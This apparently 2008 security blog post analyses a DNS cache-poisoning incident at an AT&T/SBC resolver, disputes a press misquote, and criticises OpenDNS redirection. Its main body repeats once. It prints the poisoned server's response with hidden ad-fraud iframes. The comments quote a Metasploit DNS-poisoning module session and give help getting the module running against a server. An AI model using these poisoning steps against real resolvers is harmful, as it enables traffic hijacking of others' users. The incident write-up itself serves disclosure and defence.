DNS Attacks in the Wild
In a recent conversation with Robert McMillan (IDG), I described a in-the-wild attack against one of AT&T's DNS cache servers, specifically one that was configured as an upstream forwarder for an internal DNS machine at BreakingPoint Systems. The attackers had replaced the cache entry for www.google.com with a web page that loaded advertisements hidden inside an iframe. This attack affected anyone in the Austin, Texas region using that AT&T Internet Services (previously SBC) DNS server. The attack itself was not malicious, did not load malware, and from an operational standpoint, had zero impact. I contacted the ISP, worked with our IT folks to switch forwarding services, and wrote a cache auditing tool. I found the "wild" attack interesting, so in a conversation with Robert McMillan, I brought up the incident and forwarded the associated logs and notes. Shortly after our conversation, Mr. McMillan published an article with a sensationalist title, that while containing most of the facts, attributed a quote to me that I simply did not say. Specifically, `"It's funny," he said. "I got owned."`
Most of the facts of the article are correct. I have no problem detailing the attack, how it worked, and how we detected and resolved it. I am careful about the wording, because I want to be clear that while this type of attack can be serious, in this case it was a five minute annoyance that was designed as a revenue generator for the folks who launched it (click-through advertisement revenue). No systems were been compromised, no data was stolen, and most importantly, the target of the attack was the ISP, not the company that I work for. Stating that my company was "compromised" leads the reader to believe that there was some sort of security breach, which is reinforced by the fabricated quote. Mr. McMillan has since published a correction, but by the time this trickles down to all of the IDG publications, the damage will have been done. At this time (09:00 CST), the correction is posted, but the articles themselves have not been updated.
To add some content to my whining, I have included further details on the actual attack. The DNS server in question was dns1.austtx.sbcglobal.net (151.164.20.201). This system accepted recursive requests from anywhere (not just subscribers) and is the default DNS server for anyone who purchased SBC Internet Services (in our case, a T1 line that was our primary until our fiber was run). Internally, we use two DNS servers, one going out the fiber, other going out the T1 as backup. Early Tuesday morning, some of the friends and family members of BreakingPoint employees noticed that the iGoogle web page was returning a 404 from their home internet connections. Once our folks got to the office, they noticed that every once in a while, they could also reproduce it from within our network. Digging into it, we discovered that one of our internal DNS servers was still using SBC/AT&T as an upstream forwarder and that this server was returning the wrong results for www.google.com:
$ dig +short -t a www.google.com @151.164.20.201
www.l.google.com.
67.222.48.43
When querying the same address from the other DNS server, we saw the correct results:
$ dig +short -t a www.google.com @InternalDNS
www.l.google.com.
64.233.167.99
64.233.167.104
64.233.167.147
Requesting the main web page from the "poison" www.google.com server returned a very different response from the real Google server. This server was returning four iframes, one of which showed a fake version of the Google web site, the other three loaded automated ad-clickers from three other compromised servers.
$ echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | nc 67.222.48.43 80
HTTP/1.1 200 OK
Date: Tue, 29 Jul 2008 15:30:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.6
Transfer-Encoding: chunked
Content-Type: text/html
161
<iframe width=100% height=100% frameborder=0 src="http://72.14.205.99/"></iframe>
<iframe width=0 height=0 frameborder=0 src="http://www.ramhost.org/ads.php"></iframe>
<iframe width=0 height=0 frameborder=0 src="http://www.medicaltechnic.net/ads.php"></iframe>
<iframe width=0 height=0 frameborder=0 src="http://www.funreport.net/ads.php"></iframe>
We changed the upstream forwarder for our internal DNS to point to a patched server (the ubiquitous BBN 4.2.2.x systems (OpenDNS has issues[1]), contacted the ISP, and wrote a cache validator that does not require host access to the DNS server (see the previous post for more information on that). The lesson -- even if your own DNS servers are patched, make sure none of those systems use an upstream DNS that has not. Since we contacted the ISP, this particular DNS server was taken offline. I found a list of regional SBC DNS servers and prodded them with the porttest.dns-oarc.net service. The end result was that of the 19 servers still online, 12 of them are still using static source ports, and each of these can be reached by anyone on the Internet. I wonder if they are waiting on ISC to fix BIND's performance problems.
-HD
1. OpenDNS returns poisoned records. Intentionally poisoned. For example, www.google.com points to a SQUID cache server run by OpenDNS, not the real google.com server. While I admire a service that improves security, I wonder about the impact of diverting private communications through their web cache servers. Does Google's privacy statement apply to the monitoring of traffic by OpenDNS -- I don't think so.
$ dig +short -t a www.google.com @208.67.222.222
google.navigation.opendns.com.
208.69.32.231
208.69.32.230
$ HEAD 208.69.32.231
200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Wed, 30 Jul 2008 06:49:13 GMT
Via: 1.0 .:80 (squid)
Most of the facts of the article are correct. I have no problem detailing the attack, how it worked, and how we detected and resolved it. I am careful about the wording, because I want to be clear that while this type of attack can be serious, in this case it was a five minute annoyance that was designed as a revenue generator for the folks who launched it (click-through advertisement revenue). No systems were been compromised, no data was stolen, and most importantly, the target of the attack was the ISP, not the company that I work for. Stating that my company was "compromised" leads the reader to believe that there was some sort of security breach, which is reinforced by the fabricated quote. Mr. McMillan has since published a correction, but by the time this trickles down to all of the IDG publications, the damage will have been done. At this time (09:00 CST), the correction is posted, but the articles themselves have not been updated.
To add some content to my whining, I have included further details on the actual attack. The DNS server in question was dns1.austtx.sbcglobal.net (151.164.20.201). This system accepted recursive requests from anywhere (not just subscribers) and is the default DNS server for anyone who purchased SBC Internet Services (in our case, a T1 line that was our primary until our fiber was run). Internally, we use two DNS servers, one going out the fiber, other going out the T1 as backup. Early Tuesday morning, some of the friends and family members of BreakingPoint employees noticed that the iGoogle web page was returning a 404 from their home internet connections. Once our folks got to the office, they noticed that every once in a while, they could also reproduce it from within our network. Digging into it, we discovered that one of our internal DNS servers was still using SBC/AT&T as an upstream forwarder and that this server was returning the wrong results for www.google.com:
$ dig +short -t a www.google.com @151.164.20.201
www.l.google.com.
67.222.48.43
When querying the same address from the other DNS server, we saw the correct results:
$ dig +short -t a www.google.com @InternalDNS
www.l.google.com.
64.233.167.99
64.233.167.104
64.233.167.147
Requesting the main web page from the "poison" www.google.com server returned a very different response from the real Google server. This server was returning four iframes, one of which showed a fake version of the Google web site, the other three loaded automated ad-clickers from three other compromised servers.
$ echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | nc 67.222.48.43 80
HTTP/1.1 200 OK
Date: Tue, 29 Jul 2008 15:30:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8g DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.6
Transfer-Encoding: chunked
Content-Type: text/html
161
<iframe width=100% height=100% frameborder=0 src="http://72.14.205.99/"></iframe>
<iframe width=0 height=0 frameborder=0 src="http://www.ramhost.org/ads.php"></iframe>
<iframe width=0 height=0 frameborder=0 src="http://www.medicaltechnic.net/ads.php"></iframe>
<iframe width=0 height=0 frameborder=0 src="http://www.funreport.net/ads.php"></iframe>
We changed the upstream forwarder for our internal DNS to point to a patched server (the ubiquitous BBN 4.2.2.x systems (OpenDNS has issues[1]), contacted the ISP, and wrote a cache validator that does not require host access to the DNS server (see the previous post for more information on that). The lesson -- even if your own DNS servers are patched, make sure none of those systems use an upstream DNS that has not. Since we contacted the ISP, this particular DNS server was taken offline. I found a list of regional SBC DNS servers and prodded them with the porttest.dns-oarc.net service. The end result was that of the 19 servers still online, 12 of them are still using static source ports, and each of these can be reached by anyone on the Internet. I wonder if they are waiting on ISC to fix BIND's performance problems.
-HD
1. OpenDNS returns poisoned records. Intentionally poisoned. For example, www.google.com points to a SQUID cache server run by OpenDNS, not the real google.com server. While I admire a service that improves security, I wonder about the impact of diverting private communications through their web cache servers. Does Google's privacy statement apply to the monitoring of traffic by OpenDNS -- I don't think so.
$ dig +short -t a www.google.com @208.67.222.222
google.navigation.opendns.com.
208.69.32.231
208.69.32.230
$ HEAD 208.69.32.231
200 OK
Cache-Control: private, max-age=0
Connection: close
Date: Wed, 30 Jul 2008 06:49:13 GMT
Via: 1.0 .:80 (squid)
posted by hdm at 10:33 PM
13 Comments:
HD Moore,
OpenDNS does a lot more than just protect against this attack. It lets you decide what DNS you want to allow into your network, just like you'd do with an anti-spam service for your mail server.
With regards to the Google redirect, it is done to solve some issues caused by newer versions of the Google toolbar. We do it in as clear a way as possible (hence the CNAME instead of just returning an IP).
We also make it easy to turn off just by going to "Settings -> Advanced Settings" and unchecking the box for the proxy. 99.999% of people don't care, and for the few who do, that's why we make it as crystal clear as we do. And finally, we do not keep logs of ANY of the traffic that passes through it.
It takes 15 minutes to install dnscache. Once you install it you never have to touch or look at it again for most installations and it does not need patching.
http://cr.yp.to/djbdns.html
HDM, in your ddave post you paste:
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN gov
DOMAIN => net
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > set NEWDNS msfdns.ath.cx
NEWDNS => msfdns.ath.cx
in set DOMAIN you set GOV and apeear NET
why?
That was caused by a typo -- the run I did was against NET, but I managed to screw up the parameters and redid it as GOV. When I fixed the example, I forgot to fix the echo'd value for the DOMAIN. The module works fine against either, I just found the GOV one more entertaining (its also faster to pop than GOV for some reason, I think less nameservers).
@David Ulevitch
You aren't clear about this behavior. I use OpenDNS and didn't know.
And you can get a warrant with gag order to make you keep logs while nobody knows. This isn't good at all.
Alecco
The reason why Gov servers are slower than other nameservers apparently, is due to usually improper configuration, tricky/buggy SOA records that may only be cached a special way which does not follow the standards (in some cases), thus a lot of the Gov domains, is NOT supported without www. for some funny reason. :) (i find it quite hilarious that you can't reach all .Gov domains without www.)
Even worse is that within many SOA records on Gov and Mil domains, the responsible mail-address for the Nameserver is invalid, which makes it even harder to contact the responsible to fix it.
Most, if not all, of the major telco/ISPs have proven that they'll log anything, and give up anything, at government request. I can't see where OpenDNS creates any more of a real or potential privacy issue than AT&T, who have already proven they won't think twice about cooperating with the government to the detriment of their customers.
AT&T's network in Austin was acting up again last night (8/2). I noticed slow loading of graphics and some failures to resolve web addresses. Running a traceroute from my home machine to www.yahoo.com showed that 4 out of 5 traces went properly to the SBC/ATT hetwork, but around 20% were just randomly being directed (after my router) to various IP addresses in China, the Phillipines, Russian Federation, etc.
Almost 4 hours dealing with AT&T tech support, and they were not acknowledging that there could be any network problems. I switched my router to use OpenDNS servers this morning and everything has been clear sailing all day.
"You aren't clear about this behavior. I use OpenDNS and didn't know."
I use OpenDNS too, and I did know. It's not exactly hidden (Settings -> Advanced Settings). I think the folks at OpenDNS are very clear about their operation, as their note on this subject (http://www.opendns.com/support/article/244) would appear to confirm.
"And you can get a warrant with gag order to make you keep logs while nobody knows. This isn't good at all."
You can also disable the (limited) OpenDNS proxy, as outlined above. As for a warrant with gag order, the same could be said for everything you do while online, from your ISP to Google, and everything in between. If you're THAT concerned about your privacy, your only real solution would be to disconnect the Ethernet cable from your machine. Oh yeah... might want to watch what you check out from your local library too (http://www.ala.org/ala/washoff/woissues/civilliberties/theusapatriotact/usapatriotact.cfm)!
Hi, i install metasploit 3.1 on gentoo and when i copy bailiwicked_host to modules... and when i put "msfconsole" then on list of exploits,auxilities etc.. doesn't exists bailiwicked_host. What is wrong? sbd help?
You need the SVN version (3.2-dev):
$ svn co http://metasploit.com/svn/framework3/trunk
huh thx hdm it works but not on my dns server. i was waiting 1 hour and metasploit still continountig process ... so it may takes years.. hmm maybe i have to slow computer? (p4 2.4 512mb ram)
If it hasn't worked in about 5 minutes, something has gone wrong. Check the log files of the server, verify that the correct SRCPORT is used (or that its actually static). We have seen reports that BIND 9.2.x and 9.3.x are not working, but have not been able to confirm.
Post a Comment
Links to this post:
Create a Link
<< Home